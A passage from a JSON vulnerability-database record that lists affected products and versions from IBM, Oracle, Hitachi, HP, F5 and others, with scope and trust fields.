            "version": "5.5"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.01"
          },
          {
            "_id": null,
            "model": "weblogic server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.2.1.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "tivoli endpoint manager for remote control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "identity manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.1.22"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "5"
          },
          {
            "_id": null,
            "model": "tiered storage manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.5.0-02"
          },
          {
            "_id": null,
            "model": "weblogic portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.3.6.0"
          },
          {
            "_id": null,
            "model": "retail clearance optimization engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "14.0"
          },
          {
            "_id": null,
            "model": "tivoli storage productivity center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.2.0"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2"
          },
          {
            "_id": null,
            "model": "sitescope monitors 11.32ip1",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.1.1"
          },
          {
            "_id": null,
            "model": "rational insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.13"
          },
          {
            "_id": null,
            "model": "enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "5"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (linux(rhel",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-06"
          },
          {
            "_id": null,
            "model": "sitescope",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "11.11"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "websphere service registry and repository",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "tuning manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.6.1-05"
          },
          {
            "_id": null,
            "model": "weblogic server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.2.1.2"
          },
          {
            "_id": null,
            "model": "sitescope",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "11.22"
          },
          {
            "_id": null,
            "model": "sitescope",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "11.1"
          },
          {
            "_id": null,
            "model": "business server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "1x8664"
          },
          {
            "_id": null,
            "model": "infosphere balanced warehouse c3000",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-05"
          },
          {
            "_id": null,
            "model": "tivoli netcool configuration manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.4.1"
          },
          {
            "_id": null,
            "model": "tivoli system automation application manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "jdeveloper",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.1.17.0"
          },
          {
            "_id": null,
            "model": "cognos business intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1.1"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (linux(sles",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.0.0-00"
          },
          {
            "_id": null,
            "model": "tivoli composite application manager for application diagnostics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "retail central office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "14.0"
          },
          {
            "_id": null,
            "model": "retail back office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.4"
          },
          {
            "_id": null,
            "model": "websphere service registry and repository",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "retail returns management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.3"
          },
          {
            "_id": null,
            "model": "rational insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.12"
          },
          {
            "_id": null,
            "model": "contact optimization",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "device manager software (linux(suse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-00"
          },
          {
            "_id": null,
            "model": "rational insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.11"
          },
          {
            "_id": null,
            "model": "retail markdown optimization",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.0"
          },
          {
            "_id": null,
            "model": "content collector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "xp p9000 tiered storage manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.6.1-06"
          },
          {
            "_id": null,
            "model": "content analytics with enterprise search",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.3-00"
          },
          {
            "_id": null,
            "model": "icewall configuration manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.02"
          },
          {
            "_id": null,
            "model": "arx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "6.1.1"
          },
          {
            "_id": null,
            "model": "enterprise data quality",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.11"
          },
          {
            "_id": null,
            "model": "primavera p6 enterprise project portfolio management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "16.1"
          },
          {
            "_id": null,
            "model": "tivoli netcool/omnibus web gui",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.3.1"
          },
          {
            "_id": null,
            "model": "device manager software (linux(sles",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.0.1-02"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (linux(suse",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-06"
          },
          {
            "_id": null,
            "model": "tuning manager software )",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.2-01"
          },
          {
            "_id": null,
            "model": "xp7 global link manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "8.0.0-00"
          },
          {
            "_id": null,
            "model": "business process manager express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0"
          },
          {
            "_id": null,
            "model": "tiered storage manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.4.0-07"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.5"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.51"
          },
          {
            "_id": null,
            "model": "identity manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.1.1.7"
          },
          {
            "_id": null,
            "model": "tuning manager software (linux(suse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-05"
          },
          {
            "_id": null,
            "model": "tiered storage manager software -00",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.1.1"
          },
          {
            "_id": null,
            "model": "weblogic portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.1.0"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (solaris(sp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.4.0-07"
          },
          {
            "_id": null,
            "model": "tivoli integrated portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "device manager software (solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.1-03(x64))"
          },
          {
            "_id": null,
            "model": "smart analytics system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "20500"
          },
          {
            "_id": null,
            "model": "websphere service registry and repository",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "records manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.4"
          },
          {
            "_id": null,
            "model": "tiered storage manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-00"
          },
          {
            "_id": null,
            "model": "retail central office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.0"
          },
          {
            "_id": null,
            "model": "business process manager advanced",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.0.1"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-08-00-03"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.1"
          },
          {
            "_id": null,
            "model": "tuning manager software (linux(rhel",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-06"
          },
          {
            "_id": null,
            "model": "tivoli storage manager administration center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler distributed",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "business process manager advanced",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.2"
          },
          {
            "_id": null,
            "model": "device manager software (solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.0-00(x64))"
          },
          {
            "_id": null,
            "model": "global link manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.1-01"
          },
          {
            "_id": null,
            "model": "websphere service registry and repository",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "cognos business intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.2.1"
          },
          {
            "_id": null,
            "model": "rational insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "business process manager advanced",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.1.2"
          },
          {
            "_id": null,
            "model": "websphere enterprise service bus",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.5.0.2"
          },
          {
            "_id": null,
            "model": "infosphere master data management collaborative edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "-10.1"
          },
          {
            "_id": null,
            "model": "utilities framework",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "4.2.0.2.0"
          },
          {
            "_id": null,
            "model": "xp p9000 replication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "8.0.0-00"
          },
          {
            "_id": null,
            "model": "retail invoice matching",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.1"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.5.0.3"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.1"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler distributed",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.6"
          },
          {
            "_id": null,
            "model": "business process manager advanced",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.1.2"
          },
          {
            "_id": null,
            "model": "tivoli storage productivity center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.1.1"
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "tiered storage manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "0"
          },
          {
            "_id": null,
            "model": "xp p9000 replication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "8.0.0-06"
          },
          {
            "_id": null,
            "model": "omnifind enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "sitescope",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "11.10"
          },
          {
            "_id": null,
            "model": "rational reporting for development intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "smart analytics system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "57100"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "tivoli integrated portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.114"
          },
          {
            "_id": null,
            "model": "cognos business intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.4.1"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.4.0-07"
          },
          {
            "_id": null,
            "model": "business process manager advanced",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.1.1"
          },
          {
            "_id": null,
            "model": "cognos business intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "global link manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.1-00"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3"
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.5.0-02"
          },
          {
            "_id": null,
            "model": "openpages grc platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "tivoli system automation application manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.1"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-10-03"
          },
          {
            "_id": null,
            "model": "cognos business intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.2"
          },
          {
            "_id": null,
            "model": "security identity manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.5"
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.2-00"
          },
          {
            "_id": null,
            "model": "device manager software (linux(suse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.6.1-05"
          },
          {
            "_id": null,
            "model": "security qradar",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "distributed marketing",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "sitescope monitors",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "11.20"
          },
          {
            "_id": null,
            "model": "secure analytics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "2012.1"
          },
          {
            "_id": null,
            "model": "business process manager advanced",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.5"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-00"
          },
          {
            "_id": null,
            "model": "rational insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0.1"
          },
          {
            "_id": null,
            "model": "retail back office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.2"
          },
          {
            "_id": null,
            "model": "linux s/390",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.52"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (linux(sles",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.4.0-07"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-08-00-02"
          },
          {
            "_id": null,
            "model": "content manager records enabler",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.4"
          },
          {
            "_id": null,
            "model": "retail invoice matching 12.0in",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "rational reporting for development intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.4"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.1"
          },
          {
            "_id": null,
            "model": "knowledge",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.5.1"
          },
          {
            "_id": null,
            "model": "infosphere master data management server for product information",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "device manager software (solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.1-02(x64))"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.6"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.1"
          },
          {
            "_id": null,
            "model": "weblogic server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.2.1.1"
          },
          {
            "_id": null,
            "model": "retail back office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "14.1"
          },
          {
            "_id": null,
            "model": "tiered storage manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.1.0-00"
          },
          {
            "_id": null,
            "model": "security qradar",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "rational insight ifix1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0.1"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (solaris(sp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.1.0-00"
          },
          {
            "_id": null,
            "model": "ds8870",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "device manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-00"
          },
          {
            "_id": null,
            "model": "jboss fuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.1.0"
          },
          {
            "_id": null,
            "model": "distributed marketing",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "websphere partner gateway enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.2"
          },
          {
            "_id": null,
            "model": "rational reporting for development intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.3"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.53"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (solaris(sp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.6.1-05"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.0.34"
          },
          {
            "_id": null,
            "model": "tivoli storage productivity center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "global link manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-00"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.4"
          },
          {
            "_id": null,
            "model": "utilities framework",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "4.2.0.1.0"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-05"
          },
          {
            "_id": null,
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "ds8870",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.4"
          },
          {
            "_id": null,
            "model": "distributed marketing",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "centos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "centos",
            "version": "5"
          },
          {
            "_id": null,
            "model": "websphere enterprise service bus",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7"
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.001"
          },
          {
            "_id": null,
            "model": "tivoli storage productivity center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.2.2143"
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "sitescope",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "11.12"
          },
          {
            "_id": null,
            "model": "tuning manager software )",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.402"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-08-50"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "xp p9000 replication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.6.1-06"
          },
          {
            "_id": null,
            "model": "tivoli storage manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "tuning manager software )",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (solaris(x6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.6.1-05"
          },
          {
            "_id": null,
            "model": "real-time decision server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.1.1.7"
          },
          {
            "_id": null,
            "model": "distributed marketing",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "retail invoice matching",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "tuning manager software )",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.1-00"
          },
          {
            "_id": null,
            "model": "retail invoice matching",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "14.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.0.37"
          },
          {
            "_id": null,
            "model": "tuning manager software (solaris(sp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.6.1-05"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "openpages",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.0.1"
          },
          {
            "_id": null,
            "model": "tivoli dynamic workload console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.4"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.1.0-00"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1"
          },
          {
            "_id": null,
            "model": "sitescope",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "11.21"
          },
          {
            "_id": null,
            "model": "retail markdown optimization",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.4"
          },
          {
            "_id": null,
            "model": "leads",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "rational reporting for development intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.6"
          },
          {
            "_id": null,
            "model": "sitescope",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "11.24.271"
          },
          {
            "_id": null,
            "model": "lotus expeditor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.2.1"
          },
          {
            "_id": null,
            "model": "tiered storage manager software )",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.0-00"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (linux(suse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-05"
          },
          {
            "_id": null,
            "model": "tivoli storage productivity center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.1.1.1"
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-00"
          },
          {
            "_id": null,
            "model": "tuning manager software )",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.2-00"
          },
          {
            "_id": null,
            "model": "tiered storage manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.4.0-08"
          },
          {
            "_id": null,
            "model": "retail central office",
